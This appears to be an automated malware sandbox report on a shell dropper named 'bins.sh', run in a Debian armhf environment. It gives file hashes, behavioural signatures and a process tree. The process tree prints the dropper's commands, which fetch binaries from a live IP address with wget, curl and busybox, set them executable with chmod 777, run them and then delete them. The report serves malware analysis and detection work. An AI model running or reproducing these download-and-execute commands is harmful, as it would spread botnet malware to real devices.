Overview

overview

9

Static

static

1

bins.sh

ubuntu-18.04-amd64

9

bins.sh

debian-9-armhf

7

bins.sh

debian-9-mips

8

bins.sh

debian-9-mipsel

9

Analysis

  • max time kernel
    6s
  • max time network
    9s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    24-11-2024 00:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    189e44c8b7f08b35f7db2c3a93458409

  • SHA1

    02f6a3087388a4fd264c352cb40ba6a7aa3867d0

  • SHA256

    40d95128ef74aeb3e7db7937e9f0a369166df804da9ef079f261d12f41290c19

  • SHA512

    26d3894c6c0069e9ce08a08094a5bf9335d980c9f377948f05abc558e59a67e4a98aa59bc9457eaa242223782d2b811821ed53875fa2ca82a96575cf6cb371d2

  • SSDEEP

    192:HX8IUOHvcLp1JgfQomvLw2VMEaiqTfZ1JgMIUOHvc/aiqTf2QomvLDO:HX8IUOHvcLp1JgfQomvLw2VMd1JgMIUZ

Score
7/10
antivmdefense_evasiondiscovery

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:644
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:651
        • /usr/bin/wget
          wget http://216.126.231.240/bins/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
          2⤵
          • Writes file to tmp directory
          PID:653
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • Writes file to tmp directory
          PID:667
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
          2⤵
          • Writes file to tmp directory
          PID:674
        • /bin/chmod
          chmod 777 oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
          2⤵
          • File and Directory Permissions Modification
          PID:677
        • /tmp/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
          ./oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
          2⤵
          • Executes dropped EXE
          PID:678
        • /bin/rm
          rm oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
          2⤵
            PID:680
          • /usr/bin/wget
            wget http://216.126.231.240/bins/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
            2⤵
              PID:681
            • /usr/bin/curl
              curl -O http://216.126.231.240/bins/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
              2⤵
                PID:682

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • /tmp/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
              Filesize

              99KB

              MD5

              9438d9bc392bcf300a5583b6df5bc8f6

              SHA1

              375a6ae34b516f6f3eeea8030c4084f585017efa

              SHA256

              68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

              SHA512

              1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

              Download Submit